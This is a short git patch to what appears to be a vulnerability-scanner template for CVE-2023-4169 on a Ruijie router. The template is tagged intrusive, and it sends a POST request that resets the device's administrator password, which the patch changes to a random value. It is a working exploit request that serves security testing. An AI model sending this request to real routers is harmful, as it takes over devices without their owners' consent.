From ae2aba2c3c72df3dc4628f445e8ffeeae9aa7acb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 2 Nov 2023 12:28:15 +0530 Subject: [PATCH] Update CVE-2023-4169.yaml --- http/cves/2023/CVE-2023-4169.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 57468b916c..2e3309b51e 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -16,6 +16,9 @@ info: product: rg-ew1200g_firmware tags: cve,cve2023,ruijie,router,intrusive +variables: + password: "{{rand_base(8)}}" + http: - method: POST path: @@ -23,7 +26,7 @@ http: body: | { "username":"web", - "admin_new":"admin" + "admin_new":"{{password}}" } matchers-condition: and @@ -31,9 +34,7 @@ http: - type: word part: body words: - - '友情提示' - '"result":"ok"' - condition: and - type: word part: header